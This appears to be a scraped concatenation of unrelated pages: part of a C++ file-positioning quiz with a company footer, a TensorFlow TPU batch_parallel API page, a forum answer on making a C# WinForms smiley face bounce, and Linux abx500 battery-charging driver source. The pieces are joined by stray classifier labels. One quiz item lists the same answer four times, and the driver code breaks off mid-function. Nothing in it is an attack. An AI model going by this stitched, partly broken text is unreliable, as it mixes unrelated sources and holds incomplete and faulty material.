Then I needed to run a shorter list of words against this list of words and get edit distances:
var result = new List<int>();
foreach (string word1 in words)
{
foreach (string word2 in words2)
{
result.Add(EditDistance(word1, word2));
}
}
Interestingly enough, this process takes quite a while. Especially if I have a few hundred thousand words in my word list. Go figure.
But since I am using .Net 4.0 (like any normal obsessive developer), I might have the great idea to leverage the awesome parallel libraries included in .Net 4.0 such as System.Threading.Tasks.Parallel.ForEach… phew, that was long:
var result = new List<int>();
Parallel.ForEach(words, word1 =>
{
foreach (string word2 in words2)
{
result.Add(EditDistance(word1, word2));
}
});
Thankfully I was logging out the number of items in my result array, and I noticed an anomaly. While running single threaded I got back more items than when running in parallel. I got the performance increase I wanted, but my result was now wrong! Oooops! Thankfully I know that this was because I used a List<T> which is not thread-safe. So, I just leverage another feature in .NET 4.0, the ConcurrentBag:
var result = new ConcurrentBag<int>();
Parallel.ForEach(words, word1 =>
{
foreach (string word2 in words2)
{
result.Add(EditDistance(word1, word2));
}
});
This is great, but unfortunately I had to know that if I didn’t use the ConcurrentBag, then my result would be off, but I wouldn’t get any exceptions. Just a silent race condition which caused my result to be wrong.
But how can we avoid this? One way would be to approach the problem from a different perspective. What if we tried to solve the original problem with LINQ? Our solution would need to take all the elements from the first list, and apply all the elements from the second list to each of them. Hmm, sounds a bit like a cross join to me. This can easily be solved in LINQ with the SelectMany method:
var result = words
.SelectMany(word1 => words2.Select(word2 => EditDistance(word1, word2)));
Neato, and if we wanted to write this in the built-in query syntax, it looks like this:
var result = from word1 in words
from word2 in words2
select EditDistance(word1, word2);
And that actually looks more natural. (IMO one of the few times where the query syntax does look more natural to me) Now that we have solved it with LINQ using a more functional approach, we no longer have to worry about thread safety because we aren’t using any mutable structures. Leveraging PLINQ, all we have to do is add "AsParallel" to the main list of words:
var result = words.AsParallel()
.SelectMany(word1 => words2.Select(word2 => EditDistance(word1, word2)));
Or like this:
var result = from word1 in words.AsParallel()
from word2 in words2
select EditDistance(word1, word2);
And we have multi-threaded execution! Now, there are a few things that we still have to worry about, such as ordering. But PLINQ will also allow us to specify it like this:
var result = words.AsParallel().AsOrdered()
.SelectMany(word1 => words2.Select(word2 => EditDistance(word1, word2)));
And there you have it, without all that much effort, but by leveraging some simple LINQ queries, we have created a nicely scalable piece of parallel code. I hope you found this interesting, and I hope that you’ll let me know if you get a chance to use any of this in your applications!
I’m creating a series on LINQ over at TekPub, go check it out!
I had some inquiries as to the performance of this on my machine, and so here are the relative measurements:
foreach loop – 37 seconds
Parallel.ForEach – 31 seconds – This could be further optimized
LINQ – 39 seconds
LINQ with AsParallel() – 23 seconds
LINQ with AsParallel() and AsOrdered() – 25 seconds
The Parallel.ForEach was a naive implementation that used the ConcurrentBag in order to achieve thread safety. Unfortunately this isn’t as efficient as we could make it. This could be optimized by using another overload of Parallel.ForEach in order to implement a list per thread and then combine them at the end. That would give us much better performance.
Be Sociable, Share!
7 comments
1. Great post — thanks. What sort of performance improvements did you see moving to the parallel implementation?
2. Very interesting Justin. It would have been really cool if you compared the execution times with and without using any parallel extensions and posted them as part of the post.
How significant was the increase in performance?
3. @Danimal @Rob I have posted the performance numbers that I saw. Unfortunately I only have a dual core proc to try it on.
4. Thanks Justin. It’s pretty cool that with a pretty easy coding change you could get an impressive performance improvement.
5. Great post, thanks. This was especially interesting for me, as I wrote a parallel processing framework for the purpose of running Levenshtein in .NET 2.0! I will experiment to see if this is any faster, but man, it would have saved me a lot of work back then.
I assume you were using Levenshtein only for the purpose of demo-ing this new framework, but if you actually are trying to optimize, you should use this version of Levenshtein. It’s 2.5 times faster – http://webreflection.blogspot.com/2009/02/levenshtein-algorithm-revisited-25.html
6. @Sam Thanks! And yes, I just ported the code from Wikipedia directly. If I have to use it in production, I’ll most certainly check out your implementation. Actually, I’ll probably check it out for fun anyways. :-)
7. Hello, thanks for the great blog post.
Under what licence have you released this code you wrote that is now listed on this wiki entry?
http://en.wikipedia.org/wiki/Damerau%E2%80%93Levenshtein_distance
MIT/GPL like jquery ? http://jquery.org/license
Thanks!
Jeff
Leave a Reply
Your email address will not be published. Required fields are marked *
|
__label__pos
| 0.966173 |
Tech Model Railroad Club
Guy Lochhead, 01/09/10
A model railroad club at Massachusetts Institute of Technology (MIT) that played a hugely important role in the origins of hacker culture. TMRC developed several pioneering computer programs, including Colossal Typewriter (early text editing), Expensive Tape Recorder (digital recording twenty years ahead of its time), Expensive Planetarium (accurate star map for ‘Spacewar!’), Spacewar! (one of the earliest video games) and Expensive Desk Calculator (computing’s first interactive calculation program). They also coined numerous hacker slang terms, and are widely credited as the origins of the ‘information wants to be free’ free content motto. This is pretty much the birth of nerd culture. It’s so far beyond my comprehension and I love it. It coupled genuine innovation with an anti-monopoly and pro-sharing ethic. It is an example of friends feeding off each other to use knowledge in an incredibly exciting, admirable way. And they managed to keep a rad sense of humour! They work hard, they play hard!
Leave a Reply
Your email address will not be published. Required fields are marked *
|
__label__pos
| 0.683259 |
4ccd87594e7c77bef38372957dc4801f43021c0f
[auf_rh_dae.git] / project / dae / forms.py
1 # -*- encoding: utf-8 -*-
2
3 from django.db.models import Q
4 from django import forms
5 from django.forms.models import inlineformset_factory
6 from django.contrib.admin import widgets as admin_widgets
7 from ajax_select.fields import AutoCompleteSelectField
8 from auf.django.workflow.forms import WorkflowFormMixin
9 from datamaster_modeles import models as ref
10 from dae import models as dae
11 from utils import get_employe_from_user, is_user_dans_services_centraux
12 from rh_v1 import models as rh
13 from workflow import grp_drh, POSTE_ETATS_BOUTONS
14
15 def _implantation_choices(obj, request):
16 # TRAITEMENT NORMAL
17 employe = get_employe_from_user(request.user)
18 # SERVICE
19 if is_user_dans_services_centraux(request.user):
20 q = Q(**{ 'id' : employe.implantation_id })
21 # REGION
22 else:
23 q = Q(**{ 'region' : employe.implantation.region })
24
25 # TRAITEMENT DRH
26 if grp_drh in request.user.groups.all():
27 q = Q()
28 return [('', '----------')] + [(i.id, unicode(i), )for i in ref.Implantation.objects.filter(q)]
29
30 def _employe_choices(obj, request):
31 q = Q(id_rh__isnull=True) & Q(id_rh__isnull=True)
32
33 # TRAITEMENT NORMAL
34 employe = get_employe_from_user(request.user)
35 # SERVICE
36 if is_user_dans_services_centraux(request.user):
37 q_region_service = Q(implantation1=employe.implantation) | Q(implantation2=employe.implantation)
38 # REGION
39 else:
40 q_region_service = Q(implantation1__region=employe.implantation.region) | Q(implantation2__region=employe.implantation.region)
41 # TRAITEMENT DRH
42 if grp_drh in request.user.groups.all():
43 q_region_service = Q()
44
45 # Construction de la liste des employés en puisant dans DAE (pas d'info) et dans rh_v1
46 # Pour le filtrage par région/service, on est obligé d'aller regarder le dossier rh_v1
47 # car l'information dans le modèle rh_v1.Employe n'existe pas.
48 dae_ = dae.Employe.objects.filter(id_rh__isnull=True)
49 copies = dae.Employe.objects.filter(Q(id_rh__isnull=False))
50 id_copies = [p.id_rh_id for p in copies.all()]
51 employes_ids = list(set([d.employe_id for d in rh.Dossier.objects.filter(q_region_service)]))
52 rhv1 = rh.Employe.objects.filter(id__in=employes_ids).exclude(id__in=id_copies)
53
54 def option_label(employe):
55 return "%s %s" % (employe.nom.upper(), employe.prenom.title())
56
57 return [('', 'Nouvel employé')] + \
58 sorted([('dae-%s' % p.id, option_label(p)) for p in dae_ | copies] +
59 [('rh-%s' % p.id, option_label(p)) for p in rhv1],
60 key=lambda t: t[1])
61
62
63 def label_poste_display(poste):
64 """Formate un visuel pour un poste dans une liste déroulante"""
65 label = u"%s - %s [%s]" %(poste.type_poste, poste.type_poste.famille_emploi.nom, poste.id)
66 return label
67
68 class PostePieceForm(inlineformset_factory(dae.Poste, dae.PostePiece)):
69 pass
70
71 class DossierPieceForm(inlineformset_factory(dae.Dossier, dae.DossierPiece)):
72 pass
73
74 class FinancementForm(inlineformset_factory(dae.Poste, dae.PosteFinancement, extra=2)):
75 pass
76
77
78 class DossierComparaisonForm(forms.ModelForm):
79
80 recherche = AutoCompleteSelectField('dossiers', required=False)
81 poste = forms.CharField(max_length=255, widget=forms.TextInput(attrs={'size':'60'}))
82
83 class Model:
84 model = dae.DossierComparaison
85
86 class DossierComparaisonForm(inlineformset_factory(dae.Dossier, dae.DossierComparaison, extra=3, max_num=3, form=DossierComparaisonForm)):
87 pass
88
89 class PosteComparaisonForm(forms.ModelForm):
90
91 recherche = AutoCompleteSelectField('postes', required=False)
92
93 class Model:
94 model = dae.PosteComparaison
95
96 class PosteComparaisonForm(inlineformset_factory(dae.Poste, dae.PosteComparaison, extra=3, max_num=3, form=PosteComparaisonForm)):
97 pass
98
99 class FlexibleRemunForm(forms.ModelForm):
100
101 montant_mensuel = forms.DecimalField(required=False)
102 montant = forms.DecimalField(required=True, label='Montant annuel')
103
104 class Meta:
105 model = dae.Remuneration
106
107 class RemunForm(inlineformset_factory(dae.Dossier, dae.Remuneration, extra=5, form=FlexibleRemunForm)):
108 pass
109
110 class PosteForm(forms.ModelForm):
111 """ Formulaire des postes. """
112
113 responsable=AutoCompleteSelectField('responsables', required=True)
114 #responsable = forms.ModelChoiceField(
115 # queryset=rh.Poste.objects.select_related(depth=1))
116
117 # La liste des choix est laissée vide. Voir __init__ pour la raison.
118 poste = forms.ChoiceField(label="Nouveau poste ou évolution du poste",
119 choices=(), required=False)
120
121 valeur_point_min = forms.ModelChoiceField(queryset=rh.ValeurPoint.actuelles.all(), required=False)
122 valeur_point_max = forms.ModelChoiceField(queryset=rh.ValeurPoint.actuelles.all(), required=False)
123
124
125 class Meta:
126 model = dae.Poste
127 exclude = ('actif', )
128 fields = ('type_intervention',
129 'poste', 'implantation', 'type_poste', 'service', 'nom',
130 'responsable', 'local', 'expatrie', 'mise_a_disposition',
131 'appel', 'date_debut', 'date_fin',
132 'regime_travail', 'regime_travail_nb_heure_semaine',
133 'classement_min', 'classement_max',
134 'valeur_point_min', 'valeur_point_max',
135 'devise_min', 'devise_max',
136 'salaire_min', 'salaire_max',
137 'indemn_expat_min', 'indemn_expat_max',
138 'indemn_fct_min', 'indemn_fct_max',
139 'charges_patronales_min', 'charges_patronales_max',
140 'autre_min', 'autre_max', 'devise_comparaison',
141 'comp_locale_min', 'comp_locale_max',
142 'comp_universite_min', 'comp_universite_max',
143 'comp_fonctionpub_min', 'comp_fonctionpub_max',
144 'comp_ong_min', 'comp_ong_max',
145 'comp_autre_min', 'comp_autre_max',
146 'justification',
147 )
148 widgets = dict(type_intervention=forms.RadioSelect(),
149 appel=forms.RadioSelect(),
150 nom=forms.TextInput(attrs={'size': 60},),
151 date_debut=admin_widgets.AdminDateWidget(),
152 date_fin=admin_widgets.AdminDateWidget(),
153 justification=forms.Textarea(attrs={'cols': 80},),
154 #devise_min=forms.Select(attrs={'disabled':'disabled'}),
155 #devise_max=forms.Select(attrs={'disabled':'disabled'}),
156 )
157
158 def __init__(self, *args, **kwargs):
159 """ Mise à jour dynamique du contenu du menu des postes.
160
161 Si on ne met le menu à jour de cette façon, à chaque instantiation du
162 formulaire, son contenu est mis en cache par le système et il ne
163 reflète pas les changements apportés par les ajouts, modifications,
164 etc...
165
166 Aussi, dans ce cas-ci, on ne peut pas utiliser un ModelChoiceField
167 car le "id" de chaque choix est spécial (voir _poste_choices).
168
169 """
170 request = kwargs.pop('request')
171 super(PosteForm, self).__init__(*args, **kwargs)
172 self.fields['poste'].choices = self._poste_choices(request)
173 self.fields['implantation'].choices = _implantation_choices(self, request)
174
175 # Quand le dae.Poste n'existe pas, on recherche dans les dossiers rhv1
176 if self.instance and self.instance.id is None:
177 dossiers = self.instance.get_dossiers()
178 if len(dossiers) > 0:
179 self.initial['service'] = dossiers[0].service_id
180 self.initial['nom'] = "%s %s" % (self.initial['nom'], self.instance.get_complement_nom())
181
182
183 def _poste_choices(self, request):
184 """ Menu déroulant pour les postes.
185
186 Constitué des postes de dae et des postes de rh_v1 qui n'ont pas
187 d'équivalent dans dae.
188
189 """
190 dae_ = dae.Poste.objects.ma_region_ou_service(request.user).filter(actif=True, id_rh__isnull=True)
191 copies = dae.Poste.objects.ma_region_ou_service(request.user).exclude(id_rh__isnull=True)
192 id_copies = [p.id_rh_id for p in copies.all()]
193 rhv1 = rh.Poste.objects.ma_region_ou_service(request.user).filter(actif=True).exclude(id__in=id_copies)
194 # Optimisation de la requête
195 rhv1 = rhv1.select_related(depth=1)
196
197 return [('', 'Nouveau poste')] + \
198 sorted([('dae-%s' % p.id, label_poste_display(p)) for p in dae_ | copies] +
199 [('rh-%s' % p.id, label_poste_display(p)) for p in rhv1],
200 key=lambda t: t[1])
201
202 def clean(self):
203 """
204 Validation conditionnelles de certains champs.
205 """
206 cleaned_data = self.cleaned_data
207
208 # Gestion de la mise à disposition
209 mise_a_disposition = cleaned_data.get("mise_a_disposition")
210 valeur_point_min = cleaned_data.get("valeur_point_min")
211 valeur_point_max = cleaned_data.get("valeur_point_max")
212 if mise_a_disposition is False and (valeur_point_min is None or valeur_point_max is None):
213 msg = u"Ce champ est obligatoire."
214 self._errors["valeur_point_min"] = self.error_class([msg])
215 self._errors["valeur_point_max"] = self.error_class([msg])
216 raise forms.ValidationError("Les valeurs de point sont vides")
217
218 if cleaned_data.get("local") is False and cleaned_data.get("expatrie") is False:
219 msg = "Le poste doit au moins être ouvert localement ou aux expatriés"
220 self._errors["local"] = self.error_class([msg])
221 self._errors["expatrie"] = ''
222 raise forms.ValidationError(msg)
223
224
225 return cleaned_data
226
227
228
229 def save(self, *args, **kwargs):
230 kwargs2 = kwargs.copy()
231 kwargs2['commit'] = False
232 poste = super(PosteForm, self).save(*args, **kwargs2)
233 # id_rh
234 if 'commit' not in kwargs or kwargs['commit']:
235 poste.save()
236 return poste
237
238
239 class ChoosePosteForm(forms.ModelForm):
240 class Meta:
241 model = dae.Poste
242 fields = ('poste',)
243
244 # La liste des choix est laissée vide. Voir PosteForm.__init__.
245 poste = forms.ChoiceField(choices=(), required=False)
246
247 def __init__(self, request=None, *args, **kwargs):
248 super(ChoosePosteForm, self).__init__(*args, **kwargs)
249 self.fields['poste'].choices = self._poste_choices(request)
250
251 def _poste_choices(self, request):
252 """ Menu déroulant pour les postes. """
253 dae_ = dae.Poste.objects.ma_region_ou_service(request.user).filter(id_rh__isnull=True)
254 copies = dae.Poste.objects.ma_region_ou_service(request.user).exclude(id_rh__isnull=True)
255 id_copies = [p.id_rh_id for p in copies.all()]
256
257 return [('', '----------')] + \
258 sorted([('dae-%s' % p.id, unicode(p)) for p in dae_ | copies],
259 key=lambda t: t[1])
260
261
262 class EmployeForm(forms.ModelForm):
263 """ Formulaire des employés. """
264 class Meta:
265 model = dae.Employe
266 fields = ('employe', 'nom', 'prenom', 'genre')
267
268 # La liste des choix est laissée vide. Voir Poste.__init__ pour la raison.
269 employe = forms.ChoiceField(choices=(), required=False)
270
271 def __init__(self, *args, **kwargs):
272 """ Mise à jour dynamique du contenu du menu des employés. """
273 request = kwargs.pop('request', None)
274 super(EmployeForm, self).__init__(*args, **kwargs)
275 self.fields['employe'].choices = _employe_choices(self, request)
276
277
278
279 class DossierForm(forms.ModelForm):
280 """ Formulaire des dossiers. """
281 class Meta:
282 exclude= ('etat', )
283 model = dae.Dossier
284 widgets = dict(statut_residence=forms.RadioSelect(),
285 contrat_date_debut=admin_widgets.AdminDateWidget(),
286 contrat_date_fin=admin_widgets.AdminDateWidget(),
287 )
288
289 WF_HELP_TEXT = ""
290
291 class PosteWorkflowForm(WorkflowFormMixin):
292 bouton_libelles = POSTE_ETATS_BOUTONS
293 class Meta:
294 fields = ('etat', )
295 model = dae.Poste
296
297 def __init__(self, *args, **kwargs):
298 super(self.__class__, self).__init__(*args, **kwargs)
299 self.fields['etat'].help_text = WF_HELP_TEXT
300
301
302 class DossierWorkflowForm(WorkflowFormMixin):
303 bouton_libelles = POSTE_ETATS_BOUTONS # meme workflow que poste...
304 class Meta:
305 fields = ('etat', )
306 model = dae.Dossier
307
308 def __init__(self, *args, **kwargs):
309 super(self.__class__, self).__init__(*args, **kwargs)
310 self.fields['etat'].help_text = WF_HELP_TEXT
311
|
__label__pos
| 0.982752 |
Difference Between Domain Name and Web Hosting- The Ultimate Beginners Guide 2022
6 minutes read
Last updated
May 12, 2022
Domain Name and Web Hosting
Domain & hosting are two different things but can’t work alone. So, what is a domain name, what is hosting & how these two are related to each other? You must need to know before starting to develop a website for ensuring your business's online presence.
The first thing anyone would do to launch a website or web app is to purchase a good domain name and web hosting package together. Without these two things, a website won't have an identity or existence on the internet.
So, one way or another, thinking about domain names and web hosting is undeniably important if you are planning to build a new site. However, when web development and management are common, people mix up these two wholly different things and make a mess.
Thus, let's try to melt the ice from the debate, domain vs hosting today. Here is all the detailed information you need to know about domain name and web host so that you can have a translucent concept on the matter and start making your website with a good start.
What is Domain Name?
domain name
In your browser's address bar, when you put the address of a website, you could see a part after www. This specific part is unique and different from all other active addresses. It carries the identity of the website of what it belongs to. So Internet surfers across the world can get access or identify a website or web app right by that part of the web address. This so-called unique portion is what we all call a website domain name.
In short, a domain name is what represents the owning website by its relevancy and uniqueness.
Power Up Your Website With Blazing Fast WordPress Hosting. Start at 0.88 $/month only!
Why Domain Name is So Important?
Suppose you are trying to bring your business online. What would you do? Surely, you'd try to purchase domain names for the official website or personal websites similar to the business, right?
If that's the case, then let's spin another question, why'd you pick a domain name from available domain databases relevant to your company website name or activities? Again, we think the answer is nothing except to let internet users find you among millions of other websites to create your site's own identity.
Types of Top Level Domains (TLDs)
top level domain
There are a lot of top-level domains, or TLDs, available on the internet. The most common are .com, .net, and .org. Also, there are some cheap website domains such as .mobi, .store, etc.
Generic Top-Level Domains
These are the domain name extensions that use at the last of the domain, such as .com, .net, and .org. There are 22 gTLDs, but only a handful are used most often.
For commercial use, ".com" is the most popular domain extension. It's been around since 1985 and is the oldest gTLD. .net is the second most popular gTLD and is used for websites that provide internet services, such as web hosting and domain registration
The organization or consortium sponsoring the sTLD is responsible for setting policy and managing the domain.
The use of sponsored top-level domains is not limited to commercial organizations. For example, .mil is used by the US military to create their unique identity. And, .gov is used by any government office.
Country Code Top-Level Domains
It is an Internet domain extension that is used to identify a country or a territory.
And, it has two specific letter codes based on country and territory. For example, .us means it is an American website and, .uk means it is a British website. Sometimes it used second-level domain extension.
ccTLDs are administered by the country's national registry. In most cases, the registry is also the operator of the corresponding top-level domain.
Infrastructure Top-Level Domains
It is the newest top-level domain that is striving to become popular. And, It would be delegated to the root zone and would be used to identify resources related to the infrastructure of the internet, such as Internet Exchange Points (IXPs), Autonomous System Numbers (ASNs), and Internet Service Providers (ISPs).
The infrastructure TLD would be administered by ICANN, and anyone can register.
Domain Registration
First of all, you'll need to decide on a domain name from domain checker tools. There is no limit to the maximum period for domain registration, but you can also register a custom domain with a minimum period of one year from domain registrars.
You have to register a domain using your personal information. This information will be used to create your domain's WHOIS record, which is a public database of all domain owners. However, you can turn on domain privacy protection to pretend information leaks.
Choosing a perfect domain name can be one of the most important steps in establishing your brand or business.
What is Web Hosting?
web hosting
Next up, it's time to discuss what is hosting.
Speaking straight, web hosting is something that gives ground to websites on the internet. Hosting services actually host domain names attached to websites to perform and respond to users.
When you are done with the things like domain registration, you are given the option to choose a web hosting to host domain name via DNS setting.
What Factors Should Look Before Choosing Any Web Host?
Before choosing any web host, consider the following factors to ensure the best quality service that suits you the most.
User-Friendliness
Some web hosts are more user-friendly than others. Some make it easy to find information, while others are not as clear. You want to make sure that the hosting service provider you choose has a website that is easy to navigate. Their customer service should also be good. If you have any questions or problems, you should be able to get help quickly.
Server Speed and Uptime
The server speed is how quickly the server can send the pages to your computer. You want to make sure that the pages are loading quickly so that your visitors do not get frustrated and leave your site. You can test the server speed by using a tool like Pingdom or WebPage Test.
Pricing and Plans
The most important factor to consider when choosing a web hosting plan is what type of website you plan to create. If you are creating a small website with a few pages, you may get by with a free hosting plan. However, if you create a larger website with a lot of content, you will need a more robust hosting plan that includes more storage and bandwidth.
Customer Service
Some web hosts provide excellent customer service, while others do not. You should take the time to read reviews of different web hosts to get an idea of how they treat their customers.
Types of Web Hosting
There are four types of web hosting available by hosting providers. The most common are shared, VPS, and dedicated hosting.
different types of hosting
types of domain
Shared Hosting
It is a hosting where multiple websites share space to host websites in a cheap price range.
In order to host a website at a cheap price range, several websites share a single CPU, memory, and disk space.
Usually, it's called starter hosting to get started with something cheap while your website has a small amount of traffic.
VPS Hosting
This gives you your server root access. This means you can install any software you want and customize your server to your own needs.
VPS hosting is the perfect alternative to dedicated hosting while you don't want to pay a high price tag to purchase dedicated hosting yet experience a similar service.
Dedicated Hosting
From the name, dedicated hosting is dedicated to one single person.
Sometimes it used to host a single website when you are getting massive traffic.
However, there are a lot of CPU and disk space options that you have to pick based on your traffic.
And, it is ideal for businesses that require a lot of storage space or bandwidth or for businesses that have high-traffic websites.
In addition, a dedicated server is capable of hosting multiple websites.
Cloud Hosting
It is a model of web hosting where data and applications are stored in remote servers, accessed over the internet.
The term "cloud" refers to the fact that the services are provided using a remote network of servers, which gives cloud hosting users the illusion of using a single large server.
This setup allows for easy scalability, as businesses can add or remove resources as their needs change.
Need to Buy Web Hosting Services- No Registration
There are plenty of web hosting service providers available where you can get your desired web hosting. And you can follow these steps to buy web hosting services.
• Decide what kind of hosting service you need.
• Choose a hosting provider.
• Register for an account.
• Enter your account information.
• Choose a domain name.
• Enter your site's information.
• Upload your files.
• Configure your site.
• Test your site.
Domain Name and Web Hosting Why the Confusion?
The confusion between domain names and web hosting usually comes from registering a domain name and then looking for a web hosting company. They think that the web hosting company provides the domain name, but this is not the case. The domain name registration is for creating an identity, and hosting is for storing website data.
How Domain & Hosting Relate?
The domain name and web hosting are two integral aspects of any website. The domain name is the web address or URL of a website, and the hosting is the service that stores the website's files and makes them accessible to users over the internet.
When you register a domain name, you are essentially renting the use of that name from a domain name registrar. The registrar reserves the right to make the name available to other users if you do not renew your registration.
Hosting is a service that stores the website's files on a web server and makes them accessible to users over the internet. Hosting can be provided by a web hosting company or by the registrar who sells you the domain name.
Domain Name or Web Hosting? What Should I Buy to Start a Website?
If you want a lot of control over your website and you're willing to spend a little money, buying a domain name and setting up your web hosting is the best option. If you're not comfortable with coding or website development or don't expect a lot of website traffic, using a free web hosting service may be a better option.
Wrap Up
So, here we are, at the end of our discussion. But before concluding our thoughts on domain name and web hosting, let's make a thing clear once again.
Both domain and hosting have interrelating factors between them. That's why focusing equally on both sections is important to make sure the website that is going to be made has a unique address matching with the brand name and a supportive host to perform flawlessly.
Domain & Hosting Common FAQS
Do I have to buy a domain & hosting together? Or can I buy them separately?
Domain and hosting can be bought separately, but it's often more convenient to buy them together. The domain name is a unique name or identity for your business. And hosting is where you store your data. So, when you buy hosting, you're typically also buying a domain name.
Is there any advantage of buying domain & hosting separately?
If you're looking for the best deal on each, or you want more control over your website, then buying them separately may be the right option for you; if you're not sure whether or not to buy the domain and to host separately, speak with a hosting provider to get more advice.
Can I change my hosting company without changing the domain name?
No, don't need to change your domain name while changing hosting company. However, update your DNS settings from the domain control panel to connect with new hosting.
Can I host my website?
Yes, it is possible. And, you do it in several ways. For example, you can use a web hosting company to host your website for you, or you can use a service like WordPress.com or Blogger to host your website for free. You can also purchase a domain name and set up your web server. However, setting up and maintaining your website can be a lot of work, and it can be expensive to buy and maintain your web server.
How much does it cost to host a website?
The cost to host a website can vary depending on the size and type of website and the hosting company you choose. Generally, website hosting costs between $5 and $75 per month.
Shared Hosting + Free .COM. Start at 1.85 $/month only!
Bitbytesoft
Bitbytesoft
has contributed in 61 posts
Bitbytesoft Editorial Staff is a team of experts in IT and related fields and ensures accurate and informative articles for readers worldwide.
You may find these relevant articles useful
Related Articles
Don't Miss New Blogs. Join 1000+ others
Subscription Form
Bitbyhost Flexible Hosting plans
More Categories
More Interesting Topics
You may find these relevant articles useful
Subscribe to newsletter
Join the 1000+ readers and subscribe to our monthly newsletter.
Subscription Form
Location:
Kuusikallionkuja 4, 02210, Espoo, Finland
Bangladesh: A4, Bijoy Rakeen city, Mirpur-15
Phone: +358 40 2211 600
Copyright © 2022 Bitbytesoft. All Rights Reserved.
TermsPrivacy
cloud-synccalendar-fullchart-barsselectcodecrossmenuframe-expandlayers linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram
|
__label__pos
| 0.548882 |
Phương trình chứa dấu giá trị tuyệt đối - Phạm Thành Luân
Chia sẻ: Trần Bá Trung5 | Ngày: | Loại File: PDF | Số trang:2
1
874
lượt xem
119
download
Phương trình chứa dấu giá trị tuyệt đối - Phạm Thành Luân
Mô tả tài liệu
Download Vui lòng tải xuống để xem tài liệu đầy đủ
Tài liệu "Phương trình chứa dấu giá trị tuyệt đối - Phạm Thành Luân " nhằm giúp các em học sinh có tài liệu ôn tập, luyện tập nhằm nắm vững được những kiến thức, kĩ năng cơ bản, đồng thời vận dụng kiến thức để giải các bài tập toán một cách thuận lợi và tự kiểm tra đánh giá kết quả học tập của mình, nâng cao khả năng vận dụng kiến thức vào trong các kỳ thi. Chúc các bạn học tốt...
Chủ đề:
Lưu
Nội dung Text: Phương trình chứa dấu giá trị tuyệt đối - Phạm Thành Luân
1. C. HEÄ PHÖÔNG TRÌNH - HEÄ BAÁT PHÖÔNG ⇒⎨ ⎪y ≥ 1 ⎧ ⇔⎨ ⎧y ≥ 1 ⇔1≤ y ≤ 3 TRÌNH CHÖÙA TRÒ TUYEÄT ÑOÁI. ⎪ y − 2 ≤ 1 ⎩−1 ≤ y − 2 ≤ 1 ⎩ . y = 1 thì heä VN Ví duï 1: 1− 5 . y = 2 thì ≤x≤0 ⎧x 2 + 2xy − 3y2 = 0 (1) ⎪ 2 Giaûi heä phöông trình : ⎨ . y = 3 thì x = - 1 ⎪x x + y y = −2 (2) ⎩ Vaäy nghieäm nguyeân cuûa heä: (0, 2), (-1, 3) Giaûi (1) Xem nhö phöông trình baäc 2 aån x: BAØI TAÄP ÑEÀ NGHÒ. ⎡x = y Ñònh m ñeå heä phöông trình sau coù nghieäm: ∆ ' = y2 + 3y2 = 4y2 ⇔ ⎢ ⎣ x = −3y ⎧x 2 − 3x − 4 ≤ 0 ⎪ (1) ⎡ ⎧x = y ⎡ ⎧x = y ⎡ x = y = −1 ⎨ 3 2 ⎪ ⎪ ⎪x − 3x x − m − 15m ≥ 0 (2) ⎩ ⎢⎨ ⎢⎨ ⎢ ⎢ ⎪ y y + y y = −2 ⎩ ⎢ ⎪ y y = −1 ⎩ ⎢ ⎧x = − 3 Heä ⇔ ⎢ ⇔⎢ ⇔ ⎢⎪ ⎪ 2 ⎢ ⎧x = −3y ⎪ ⎢ ⎧8y y = 2 ⎪ ⎢⎨ 1 ⎢⎨ ⎢⎨ ⎢ ⎪y = ⎢ ⎪−3y −3y + y y = −2 ⎣⎩ ⎢ ⎪ x = −3y ⎣⎩ ⎢⎪ ⎣⎩ 2 Ví duï 2: ⎧y − x 2 − x − 1 ≥ 0 (1) ⎪ Cho heä baát phöông trình: ⎨ ⎪ y − 2 + x + 1 − 1 ≤ 0 (2) ⎩ a. Giaûi heä khi y = 2 b. Tìm nghieäm nguyeân cuûa heä. Giaûi ⎧ x2 − x ≤ 1 ⎧ ⎪ ⎪−1 ≤ x 2 − x ≤ 1 a. Khi y = 2: Heä ⇔ ⎨ ⇔⎨ ⎪ x +1 ≤1 ⎪−1 ≤ x + 1 ≤ 1 ⎩ ⎩ ⎧⎧x 2 − x − 1 ≤ 0 ⎪ ⎪⎨ ⎪ 1− 5 ⇔ ⎨⎪x 2 − x + 1 ≥ 0 ⎩ ⇔ ≤x≤0 ⎪ 2 ⎪−2 ≤ x ≤ 0 ⎩ b. Ta coù: (1) ⇔ y ≥ 1 + x 2 − x ≥ 1 (2) ⇔ y − 2 ≤ 1 − x + 1 ≤ 1 129 130
2. HÖÔÙNG DAÃN VAØ GIAÛI TOÙM TAÉT (1) ⇔ −1 ≤ x ≤ 4 (2) ⇔ x 3 − 3x x ≥ m 2 + 15m ⎧x 3 + 3x 2 ,vôùi − 1 ≤ x < 0 ⎪ Ñaët f(x) = x3 − 3x x = ⎨ 3 2 ⎪x − 3x ,vôùi 0 ≤ x ≤ 4 ⎩ ⎧3x 2 + 6x, x ∈ [ −1,0 ) ⎪ f '(x) = ⎨ ⎪3x − 6x, x ∈ [ 0,4 ] 2 ⎩ Baûng bieán thieân: Heä coù nghieäm ⇔ m 2 + 15m ≤ 16 ⇔ −1 ≤ m ≤ 16 . 131
CÓ THỂ BẠN MUỐN DOWNLOAD
Đồng bộ tài khoản
|
__label__pos
| 0.977407 |
Call
whatsapp
9447387064 | 9847003556
0471-2335855 | 8089080088 | 0471-2334855
9447387064 | 9847003556
0471-2335855 | 8089080088 | 0471-2334855
Cisco Training in Trivandrum, Trinity Technologies
No.1 Training Institute in Kerala
C PROGRAM QUESTIONS : PART 26
If we have object from fstream class, then what will be the default mode of
opening the file?
ios::in|ios::out
ios::in|ios::out|ios::trunc
ios::in|ios::trunc
Default mode depends on compiler
SHOW ANSWER
Which out of the following is return type of is_open() function.
int
bool
float
char *
SHOW ANSWER
Which of the following is not used to seek a file pointer?
ios::cur
ios::set
ios::end
ios::beg
SHOW ANSWER
Which of the following options is in relevance to ios::trunc mode?
If the file is opened for output operations and it already existed, no action is
taken.
If the file is opened for output operations and it already existed, its
previous content is deleted and replaced by the new one.
If the file is opened for output operations and it already existed, then a new
copy is created.
None of above
SHOW ANSWER
Which of the following option shows correct syntax for opening a file ?
myfile:open ("example.bin", ios::out);
myfile.open ("example.bin", ios::out);
myfile::open ("example.bin", ios::out);
myfile.open ("example.bin", ios:out);
SHOW ANSWER
Which of the following is correct syntax for closing a file in c++ ?
myfile$close();
myfile@close();
myfile:close();
myfile.close();
SHOW ANSWER
Which of the given options tells about the use of eof( ) stream function ?
Returns true if a file open for reading has reached the next character.
